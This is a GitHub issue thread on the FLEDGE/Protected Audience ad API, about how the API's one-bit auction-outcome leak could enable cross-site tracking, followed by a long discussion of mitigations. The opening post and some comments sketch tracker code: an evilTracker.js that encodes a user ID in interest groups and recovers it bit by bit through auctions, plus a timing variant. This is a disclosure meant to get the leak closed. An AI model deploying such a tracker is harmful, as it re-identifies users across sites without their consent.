Utilizing the 1-bit leak to build a cross-site tracker #211
Interesting conceptual attack. This of course assumes no interference from other possible auction scripts ("the winner of the auction is the ad object which was given the highest score"). Since the results of runAdAuction are these:
...it also seems necessary to observe whether the ad in fact rendered or not? |
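(A minimal sketch of the observation under discussion, assuming the early FLEDGE behavior where runAdAuction resolves to an opaque reference to the winning ad, or to null when no ad wins; auctionConfig here is a placeholder:)

```js
// The 1-bit leak: a page can distinguish "an ad won" from "no ad won" from
// the promise's resolved value alone, without observing the render at all.
const winner = await navigator.runAdAuction(auctionConfig); // placeholder config
const bit = winner !== null ? 1 : 0;
```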
Thanks @jrmooring, this is indeed the natural fingerprinting concern associated with the one-bit leak, which FLEDGE will need to protect against in some way. As @lknik points out, this only works if the ads from the attacker face no real competition in the auction. There are generally two types of ways we can try to mitigate this sort of attack: detection (e.g. auditing how the API is used and spotting abusive patterns) and prevention (e.g. plugging the leak or adding noise).
We certainly need some approach to this problem before the removal of third-party cookies in Chrome. |
Hello @michaelkleber, and thanks for your replies. I wonder about some of the details.
So assuming that there's no competition, this may be used for tracking?
I reckon that some of these mitigations will need to be deployed. When would you start considering the final approach? The 1-bit leak has been waiting since ~2020, so I wonder when the solution will be ready for prime time. Is there any option, in your view, of releasing Turtledove without any protections in place?
Happy to hear it. API use auditing is among the recommendations I identify. But are you sure this is so easy in the case of a, in principle, fairly decentralised system? |
If there is no competition in the auction, and the buyer and seller collude, and the browser does not impose any sorts of mitigations, then the fingerprinting attack @jrmooring described would work. But of course there are many fingerprinting surfaces that browsers need to address, not just this one!
During the period where third-party cookies still exist, there is certainly value in giving developers a chance to experiment with an early and incomplete version of the FLEDGE API, so they can see how well it meets their goals. Unfortunately there is the risk that people might misunderstand and act as if the incomplete, abusable version of the API is the final version we plan to launch, so we'd need to weigh that against the developer benefit of getting to try things out sooner.
This is a good question, and I am definitely not sure; the decentralized nature does indeed make abuse detection harder. But in principle, aggregate data does seem sufficient to observe the sort of abuse we're talking about here. |
If you are looking to track users across your own properties, there are simpler ways to do so that don't involve creating all of this complex logic, for example first-party cookies and simple link decoration. |
Since interest groups are buyer-specific, we can assume that competition (diversity of ads) is directly in the buyer's control. A site owner can run a private auction where only (N) interest groups of a specific buyer participate, and leverage this flow to map user IDs. It would be difficult for client-only logic to detect and identify this attack. Interest-group-specific or outcome-specific k-anonymity thresholds may not be sufficient to prevent this. |
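(A hedged illustration of the single-buyer "private auction" described above, using the early FLEDGE config shape; both origins are hypothetical:)

```js
// Hypothetical: the seller invites exactly one (colluding) buyer, so the only
// interest groups scored are the ones that buyer controls.
const result = await navigator.runAdAuction({
  seller: 'https://publisher.example',
  decisionLogicUrl: 'https://publisher.example/score.js',
  interestGroupBuyers: ['https://sole-buyer.example'], // no competing demand
});
```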
A small note: while there certainly could be colluding buyers and sellers, in this example there aren't any -- there's just a malicious tracking script abusing browser APIs. The simplest mitigation, plugging the one-bit leak, looks attractive to me. I'll preemptively note there could be a timing attack here (one that might also make abuse detection pretty challenging) -- instead of changing its bid or score, the worklet could simply delay, so the time the auction takes to complete leaks the bit even when the outcome doesn't. |
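(A minimal sketch of the timing variant just described, assuming the scoring worklet can burn CPU; the checkBitN.js name and the metadata/auctionSignals shapes follow the issue body quoted at the bottom of this thread:)

```js
// checkBitN.js, timing variant (hedged sketch): every ad receives the same
// score, so the win/no-win channel stays silent, but scoring runs measurably
// longer when the probed bit is set.
function scoreAd(adMetadata, bid, auctionConfig, trustedScoringSignals,
                 browserSignals) {
  if (adMetadata.bit === auctionConfig.auctionSignals.bit) {
    for (let i = 0; i < 1e8; i++) {} // busy-wait to create a measurable delay
  }
  return 1;
}
```

The caller would then wrap runAdAuction in performance.now() measurements instead of checking its return value.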
@jrmooring Plugging the 1-bit leak is definitely the most appealing privacy measure! But ads that render inside Fenced Frames have some pretty substantial restrictions on how they can work — ultimately they will only get aggregate reporting, for example. With the 1-bit leak, ads that use FLEDGE targeting are subject to this new constraint, but regular contextually-targeted ads can keep working like they do today. If we make every ad render in a Fenced Frame, then any ad that competes against a FLEDGE ad ends up constrained, and understanding the impact on the ecosystem seems pretty hard. |
Well, you could also make the API not return any data unless competition exists (that is, diversity of "buyers", so that not just one is present). Maybe that could help in balancing the misuse surface? (* @michaelkleber ) |
@michaelkleber got it, totally understand the utility of the 1-bit leak, and at first take it sounds like a minor compromise to make in order to allow unmodified contextual ad competition. My intent in raising this issue isn't "hey, here's another fingerprinting mechanism for the pile", but to illustrate a specific risk of the otherwise benign-sounding leak. @lknik I actually don't think the presence of competition from other buyers would hinder this technique. The malicious seller script controls the scoring, so it can give every competing ad a score of zero and make the outcome depend only on the tracker's own interest groups. |
Yup, we're on the same page here. The question "is there real competition?" cannot just be based on whether there are other buyers in the auction, as you point out. But since the attack requires that at most one ad receive a positive score, that very sparsity is something the browser could watch for. |
@michaelkleber That's an interesting point. With the most basic setup this technique does result in at most a single ad in the auction receiving a positive score. I can't think of a realistic benign scenario where that would occur. A number of ads, all with metadata indicating "bit N of the user identifier is on", could be added under different interest groups and buyer names, but positive-score sparsity alone could still be a strong signal that something abusive is going on. With that in mind, abuse detection starts to look more feasible, but it still seems like a pretty huge piece of TBD infrastructure. This still leaves the timing attack: if the time the auction takes to complete can be observed, then checkBitN.js can leak the bit by delaying rather than by scoring, with no win/loss pattern to give it away. |
While it is interesting to track whether N consistent ads are winning for a user and detect tracking behavior, couldn't the detection be overcome by adding k more bits that shuffle the outcome? The tracking JS could figure out the valid shuffle, while to the browser it may appear reasonably random. |
Are you sure? Wouldn't the mere guarantee of competition in this case perhaps introduce a potential dose of noise? All ads are scored, but if a number of "contenders" exists, it is less guaranteed that the abusive player wins? I realize that the abusive script searches for "ad.someUniqueField == N", but other contenders would simply bid or fight for a score on other grounds - it is not guaranteed that the ads with "ad.someUniqueField == N" win, no? |
Introducing noise is certainly a worthwhile idea also! It offers a way to do prevention, not just detection. But in the attack @jrmooring described, the one bit just says whether or not the on-device auction produced any ad with score > 0. It's much much harder to use that channel if the auction includes any other ads with non-zero scores. There is the concern that there probably are some auction use cases where all ads come from the same buyer — check out #183 for example. But perhaps in that case @jrmooring is right and we could require that the contextual ad render in a Fenced Frame as well. |
Well, if the actual ("tracking") bit was 0, and the auction still ran successfully (because of some other bidder), that would be a "false" bit-1 read, no? |
Agreed. And the easiest sort of noise the browser could add of its own accord would be to sometimes ignore a subset of the IGs, producing "false" bit 0 reads. |
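(A hedged sketch of that browser-side noise; EPSILON and candidateInterestGroups are illustrative names, not a proposed spec:)

```js
// Inside the browser's auction machinery (illustrative): drop each interest
// group with small probability, so even a true bit 1 sometimes reads as 0.
const EPSILON = 0.05; // illustrative noise rate
const groupsToScore = candidateInterestGroups.filter(() => Math.random() >= EPSILON);
```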
It honestly feels like the better outcome would be to just have the contextual ad render in a fenced frame rather than add noise that will further compound with all the rest of the noise already being added in the reporting chain. If there's a path to a high-fidelity solution that remains private, I would take that every time. |
The notion of the ads ecosystem migrating to "All demand is able to render inside Fenced Frames" is extremely appealing to me also! I just don't know whether that is a realistic dependency given Chrome's timelines for third-party cookie removal. |
Migrating all, or as much as possible, of ad demand (at the ad-creative level) to some form of sandboxing of the ad itself (i.e. Fenced Frames) has so many positive benefits, data protection and otherwise, that it is worth exploring even if it seems hard. |
Yes, completely agree that this should be a long-term goal of both all browsers and the whole ads ecosystem! I just expect that it will be slow enough that we (Chrome) don't want to wait until that has succeeded to remove 3p cookies. |
Well, you just got more time. So? :-) |
Hey @michaelkleber, have read through this a few times now, think I understand better. I see how requiring everything to render in a single-size FF would result in 0 marginal bits leaking, which would make re-identification within PAA impossible. I see how k-anon doesn't change this, and I see how my "728.1 x 89.9" idea is useless, at least w/o further variance that I can't quickly think of.

Has There Been More Conversation on This?

So I'm wondering what the latest thinking is on this, and I suppose on bit leaks in general (since what we've been discussing in #825 would add bits). In particular, I'm curious about the noising "solutions", where I put quotes around solution to recognize that it would make attacks probabilistically harder, not mathematically impossible the way eliminating bit leaks would. I ask because it seems we could come up with an algorithm to make it challenging to reliably exfiltrate bits and therefore re-identify using that path, and if we could do that and it preserved important features for buyers and sellers, we might be able to get closer to a goal of "better privacy and better content" to incentivize adoption, than if we don't and ad tech migrates to other PII-based solutions with designers and implementers who are less demanding on behalf of their users.

Noise "Solution"

Again, trying to tease out your thinking: what about something that tries to randomize for "suspicious cases" but also tries to recognize legitimate actors over time:
For owner trust we could even do something PageRank-ish, where we establish a graph of weighted connections via invites/bids/wins and do the thing where your trustedness depends on the trustedness of those who trust you, etc. (If we do this, I insist we call it PaaGERank, for "Protected Audience API Generally Esteemed Rank", or something similar.) |
I'm so happy that this issue is being revisited. So first of all, thank you for the post that resurfaced it. I'll add my two cents below.
If I understand correctly, not much has been said since the previous posts. There will be some more context added in a few weeks, but aside from that... Does this warrant a solution? In other words, might there be verifiable corner cases where there is no more than one bidder/buyer?
I'm not sure if I get this right. Would the ambiguous-uses issue be a reason to use more invasive PII-based approaches?
Why not make it simpler? In other words, a runAdAuction with fewer than X buyers would always fall back to the contextual, non-auction process/ad as a result? |
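(A hedged sketch of the rule @lknik proposes above; runAuctionWithFallback, X, and contextualAdUrl are hypothetical names, and note @martinthomson's later point that a tracker can cheaply fabricate distinct buyer origins:)

```js
// Hypothetical guard: refuse to run a Protected Audience auction with fewer
// than X distinct buyers, falling back to the contextually targeted ad.
async function runAuctionWithFallback(auctionConfig, contextualAdUrl, X = 3) {
  const distinctBuyers = new Set(auctionConfig.interestGroupBuyers).size;
  if (distinctBuyers < X) return contextualAdUrl;
  const winner = await navigator.runAdAuction(auctionConfig);
  return winner ?? contextualAdUrl; // no PA winner: show the contextual ad
}
```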
More in a Few Weeks??!!

In a few weeks??!! Sounds promising/mysterious!

What I Meant: Maximizing PAA Privacy !== Maximizing Chrome User Privacy

So, to take a detour from bit leaks for a second... What I meant by the paragraph you highlighted was that making this solution maximally private doesn't help if it's not used and publishers shift to other solutions that are worse from a privacy perspective, in particular for re-identification across domains. If the cost of using PAA outweighs the benefit compared to other solutions, we won't see adoption. Existing solutions this will be compared against include:
The idea of Privacy Preserving Ads based on opaque processing, Differential Privacy techniques, and hopefully on-device processing so your data never leaves your machine, is promising. It will need adoption to succeed.

Making this Successful

I think to make this successful we'll need to iterate towards that in a way that gets ad tech to use this solution rather than others. I think the existence of Event Level Reporting, Optional FF, and the indefinite shelving of web bundles all implicitly acknowledge that. I think other features, such as the multi-size tags discussed in #825 and multi-tag auctions in #846, are other examples that would help adoption but are in tension with minimizing bit leaks. It seems likely to me that we can do a decent job of encouraging adoption by allowing feature use by the billions of legitimate ad requests a day, while making abuse of those features challenging but not mathematically impossible.

Back to Bit Leaks

Given two extreme results:
I'd prefer (1), but reasonable minds might disagree, and that's why I'd like to understand these potential solutions better.

Number of Buyers < X --> No PAA Auction

Maybe! You are probably correct that an auction with one invited advertiser, represented by a single site and the same ad tech, resulting in 1 bid, would be suspicious. However,
But, Maybe We Agree Directionally? :)

That said, maybe you're implicitly agreeing that it's worth pursuing noising of leaked bits if the noise is sufficient and the number of bits is small? :)

Addenda: Opaque On-Device Processing vs Encrypted-ID-Based Ads

It's an interesting question whether a solution like PAA is better for privacy than one based on encrypted user IDs matched for audience creation. I hope the existence of this project suggests someone believes it is, so for the purposes of this conversation I'll assume it is and say it's worth trying to make it successful. |
Oh, I misunderstood then. Fair. I'm still inclined to think that a proper tradeoff is pretty simple to find here.
All of the non-standard and invasive approaches may eventually be cut off via privacy-enhancing browser capabilities.
Let's wait those few weeks. |
Needless to say, I'm eager to see what Lukasz is teasing in a few weeks. But until then... I think the right solution here is the one we discussed above: getting the winning ad to render inside Fenced Frames, whether it comes from the Protected Audience auction or the competing contextual path.

I can sort of imagine how we might extend that to the multi-sized banner feature request in #825: the contextual flow would need to return a fallback contextually-targeted ad of each size, so that the rendered ad size does not give away who won. But it's worse than that: the winning contextual ad wouldn't necessarily be the one with the highest bid or highest SSP score; the choice would need to be randomly noised by the browser. I expect the ads ecosystem will have a lot to chew on in deciding the cost-benefit analysis of running a multi-size auction if the cost is that the browser might sometimes choose a lower-scoring ad in order to noise the ad size. And I expect the researchers will have a field day trying to figure out whether there is actually a plausible noising scheme that will make this work.

Perhaps we might be able to implement this kind of "noised multi-sized contextual fallback" system even while the 1-bit leak is still around: "If you want a multi-sized auction then you need fallback ads of each size that can render in Fenced Frames; if you want a contextually-targeted ad that cannot render in an FF then you must give up on the possibility of getting multiple sizes from the PA auction." Forcing the 1-bit leak off must happen eventually, but it would be great if that were a non-event because everyone had already chosen to voluntarily give it up in exchange for multi-size. |
This guy is a brilliant marketer, I'm hooked!
Gasp! Progress!
Yes, but if we're chewing together I am happy. I think if the "sometimes" could be responsive in some way to actual risk, established good behavior, etc., we could have a good chew. |
I'm curious to see whether the thinking here has evolved at all. I can see why there isn't much urgency around fixing this sort of leak while you still have a much larger hole open in the form of third-party cookies. However, I don't think that the framing @thegreatfatzby used is where this discussion needs to end. The sort of incremental approach suggested makes sense from a deployment perspective, but privacy concerns me most here. With that approach, privacy protections don't start when third-party cookies are removed, but when the last hole is plugged. This hole is pretty substantial. It provides fast, reliable access to cross-site information. It doesn't appear to be easy to detect abuse here (has anyone played 20 questions?). Rate limits and noise seem entirely infeasible. The seller-provided fallback ad is the only option that seems to have any hope of maintaining privacy properties. (That is, assuming that all the other explicitly temporary holes can also be patched...) |
Our recent work on Negative Targeting is the first step towards the endpoint that I think would make us all happy: contextually-targeted ad candidates flowing into the on-device final ad selection step as well. This architecture would also enable other use cases that need cross-site data, like global frequency capping. It is quite true that Chrome's removal of third-party cookies is not going to be enough to make things private. I don't think it makes sense to insist that 3PCs should be the last tracking vector to go away; indeed that hasn't been the case in any other browser either. |
First of all, my more elaborate input on this topic should be clearer in two weeks or so.
I agree that this should be addressed; the most straightforward way seems to be a process that displays the output in the same kind of frame(s) regardless of which path won.
I'm also greatly concerned with privacy design. However, for this part I'm concerned with shipping this whole PAA thing at all. And perhaps for this reason - as you mention, initially not all precautions are deployed - it is perhaps strategically better to ship the whole project and work on top of it incrementally. While this is not ideal, it is something.
I'm also concerned that abuse detection would be difficult, though if there are enough bidders, in principle the risk should be limited "in the crowd of bids". |
Hey @martinthomson, just want to tease out what you're saying a bit:

Framing

Which part of the framing are you referring to as being "not the end", and by extension what are you wanting as "yes the end" :) ? Are you thinking mostly about the ability to re-identify across contexts reliably at scale, or does your end state include more constraints like "novel inference", "any inference", "any usage of signals across domain", or even "provably non-identifiable across contexts"? (Relevant would be any thoughts you might have here.)

Incremental Approach

Do you mean the incremental approach Sandbox is taking overall, or the piece I'm saying about wanting to get adoption? Just to clarify a few things on my end:
|
The framing I wanted to push back on slightly was the two-part line:
Both are reasonable, but they come from a position I don't recognize as having much legitimacy here (not zero, just not much). I don't accept the threat of people doing worse things for privacy as a reason to weaken protections as a general rule. That wasn't your argument, but even when you pair that with the idea that those weaker protections will eventually be phased out, I can't really accept that. Chrome users suffer today with respect to privacy because they are tracked in a way that is both easy and effective, but that is not true of most other people. When you look at those people who aren't using Chrome as a baseline, making a proposal that is already extraordinarily difficult to adopt marginally less difficult to adopt at the cost of effectively removing key technical protections makes that proposal a non-starter from a privacy perspective. That is, I don't see changes here as changing the adoption cost in a meaningful way, and certainly not relative to the privacy cost associated with retaining this leak. (I'm still noodling on the negative targeting thing. The design is distinctly weird and the explainer doesn't do a great job of laying out the rationale. I'm in the process of working through some guesses and coming up short.) |
@martinthomson points all taken, some of which I'll try to parse a bit more. I'll also try to read your negative targeting comment when I can. That said, I want to dig on one thing: what are the privacy threats you want to protect against? I promise I've done my best to read FF blogs and other things (I sent in a request to take FFs privacy course but never heard back :) ), but I don't understand what you mean by "tracked easily and effectively" in a way that allows me to try to problem solve. In Chrome's Attestation and original model they refer to "re-identification across contexts", but I'm sensing you want to protect against more than that? |
@thegreatfatzby the privacy threat here remains the same cross-context re-identification one. One thing that concerns me about this particular leak is that while it is a single bit, the rich IG selection functions (priority, the cap on numbers) give the seller a lot of control over what IGs are considered in any given auction. That's a feature, for sure, but it also means that when an auction fails, that produces information that is controlled through those IG selection functions. Therefore, repeated auctions can be used to produce new information with each failure or success. In essence, I consider the existence of failures to create a querying function on a cross-site database that releases one bit at a time (hence the reference to the game of 20 questions). I don't regard Chrome's attestation as a meaningful safeguard against this, but it is notably the only protection that currently exists. It constrains good actors, which has some value, but I care more about what this does for all actors, including the bad ones. (I think that I'm following the FF=Firefox vs. FF=fenced frame abbreviations. I didn't realize that Mozilla conducted privacy courses though. Maybe I should sign up for one.) |
Hey Martin, I am mostly in agreement with you: the one-bit-per-auction leak, with a very rich, attacker-controlled mechanism for picking the bit, could absolutely be used to exfiltrate cross-site identifiers. The registration-and-attestation regime is the only thing that acts as any protection against it. However, my analysis is different from yours in one place:
The core reason for initially launching with the one-bit leak isn't actually "people who adopt will need to do slightly less work". Rather, it means fewer parties need to adopt the new APIs. If we required even contextually-targeted ads to flow into the on-device auction and be rendered in Fenced Frames, then it would be impossible for ads targeted/rendered the new way and ads targeted/rendered the old way to even compete against each other in an auction. Instead every individual ad auction would either use the new APIs or targeting based on context / first-party data / etc. That is, the one-bit leak is about not requiring Fenced Frame adoption from parties that don't care about the new API at all. I do believe that the right solution is to put all ads into Fenced Frames, eventually. And yes that does mean having everyone adopt the FF rendering flow, aggregate reporting, and so on. If Firefox feels the 1-bit leak is unacceptable even temporarily, then the way to square that circle probably is to hold off on implementing PA until the ads ecosystem is able to function in everything-in-Fenced-Frames mode. PATCG is already running this playbook for aggregate attribution reporting: working towards cross-browser standardization of an API which the thing launched in Chrome will need to evolve into over time. We're happy to do it here too. But we're also happy to start with our current proof-of-concept, gain implementer experience and ecosystem buy-in, and — even though I understand you're skeptical of this last bit — get some interim privacy improvement by removing 3rd-party cookies... even while we retain this tracking risk that people are attesting they won't use. |
Thanks for the added context @michaelkleber, that is very helpful. I hadn't really thought of it that way, but it is somewhat more than a simple tweak. I don't necessarily agree about the nature of the trade-off, but I acknowledge that it is a reasonable position. Especially from where you stand. And yeah, where we each stand is so different that maybe it doesn't make sense to reach alignment on this point. But I think we're fairly well aligned on where we want to be standing, at least broadly. So while we have a difference of opinion on how we get there, I don't want that to stop you from doing something meaningful for those people who made the choice to use your browser. As you say, it's unlikely that Firefox would be able to adopt this in its current form anyway. I'm mostly poking at this from the perspective of trying to find the shape of the thing that we might want to consider. Happy to learn that maybe this is not the inflection point on which that decision would turn. One thing that might be worth noting is that the explainer uses the phrase "As a temporary mechanism". That phrase is not connected to any of the discussion about auction failures. Would it make sense to do that, or do you consider this to be something that will operate on a different timescale to the others such that you don't want to identify it that way? |
That is correct, assuming that there's only a single bidder involved. Is it reasonable to assume this? This is also why I suggest not running algorithmic auctions unless there are at least X bidders/buyers involved.
But that's a fuzzy database with randomness involved. It isn't clear how to do this deterministically. And it would cost money to do so, no? |
I'm not assuming that. At a minimum, I am assuming that it is trivial to create the semblance of multiple buyers/bidders when they are not in fact distinct entities. That is an extension of the standard Web threat model assumption that it is easy to create a new website. So I don't think there is any protective value in setting a minimum degree of participation.
I don't see a source of randomness or a monetary cost involved. |
I see. Yes, and I agree. I explained a similar/same risk somewhere around here some time ago. Putting it all together, we have the following attack scenario:
The outcome should take into account those three points; that is the minimum.
If you have buyers X and Y that do their jobs, can the controller of X execute the scheme deterministically? |
The party running the auction (seller) gets to choose which parties (buyers) they invite to participate. That seems like a non-negotiable requirement, because these parties need to have some mechanism in place to exchange money with each other. But this surely does mean, as Martin says, that a malicious seller could hold an auction with only the malicious buyers, and no honest buyers adding noise. And while the browser expects there to be monetary cost associated with winning an auction (because the publisher gets paid somehow), certainly the money is not flowing through the browser itself, so we have no way to check that it really happened. As I said before, the right way to fix this is to not leak the bit — that is, for even the non-IG-related ads to flow into the protected auction, as we have started allowing with the Negative Targeting mechanism. We'll get there. |
Ah yes, the publisher/seller is also in the threat model. So it must all be displayed in the same frame. Is there no room to require the web browser to demand a predetermined number of buyers? Alternatively, and I think it was considered somewhere around here, implementing restricted IGs (ones in which only certain buyers may bid). But in general it's best to display it all in the same frame and move on.
Let's see how this goes! |
Hello,
I'm opening this issue to call out a specific technique that may be straightforward and reliable to use for cross-site tracking with FLEDGE, to determine if it is in fact viable, and, if it is, what changes to FLEDGE could prevent this technique from functioning.
Say we have an evilTracker.js that has registerId() and getId() functions.

registerId

registerId() encodes an N-bit identifier by joining an interest group for every 'on' bit. Example:
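(The original code blocks were lost from this copy of the issue; the snippets below are hedged reconstructions based on the surrounding prose and the early FLEDGE explainer's API shape. The origin, group names, and identifier width are illustrative.)

```js
// evilTracker.js (reconstruction): join one interest group per 'on' bit.
const TRACKER = 'https://evil-tracker.example'; // hypothetical origin
const N = 16; // identifier width, illustrative

async function registerId(userId) {
  for (let bit = 0; bit < N; bit++) {
    if ((userId >> bit) & 1) {
      await navigator.joinAdInterestGroup({
        owner: TRACKER,
        name: `bit${bit}`,
        biddingLogicUrl: `${TRACKER}/bid.js`,
        ads: [{ renderUrl: `${TRACKER}/ad.html`, metadata: { bit } }],
      }, 30 * 24 * 60 * 60 /* lifetime in seconds */);
    }
  }
}
```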
Note that biddingLogicUrl's generateBid function is a passthrough:
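(Hedged reconstruction: a constant bid on every ad, echoing the ad metadata through so the seller's scoring script can read the bit back out.)

```js
// bid.js (reconstruction): bid the same amount for every ad, passing the
// interest group's ad metadata through unchanged.
function generateBid(interestGroup, auctionSignals, perBuyerSignals,
                     trustedBiddingSignals, browserSignals) {
  const ad = interestGroup.ads[0];
  return { ad: ad.metadata, bid: 1, render: ad.renderUrl };
}
```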
getId

Now in getId(), evilTracker.js can use N auctions to query the user's ID:
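(Hedged reconstruction; TRACKER and N as above. This relies on runAdAuction resolving to null when no ad wins, which is exactly the 1-bit leak this issue describes.)

```js
// evilTracker.js, continued (reconstruction): one auction per identifier bit.
async function getId() {
  let userId = 0;
  for (let bit = 0; bit < N; bit++) {
    const winner = await navigator.runAdAuction({
      seller: TRACKER,
      decisionLogicUrl: `${TRACKER}/checkBitN.js`,
      interestGroupBuyers: [TRACKER],
      auctionSignals: { bit }, // tells the scoring script which bit to probe
    });
    if (winner !== null) userId |= 1 << bit; // a winner means the bit was 'on'
  }
  return userId;
}
```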
With checkBitN.js having the following implementation:
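(Hedged reconstruction of the scoring script: only the interest group matching the probed bit can receive a positive score, so the auction produces a winner exactly when that bit of the stored identifier is 1.)

```js
// checkBitN.js (reconstruction): score 1 for the ad whose metadata matches
// the probed bit, 0 for everything else.
function scoreAd(adMetadata, bid, auctionConfig, trustedScoringSignals,
                 browserSignals) {
  return adMetadata.bit === auctionConfig.auctionSignals.bit ? 1 : 0;
}
```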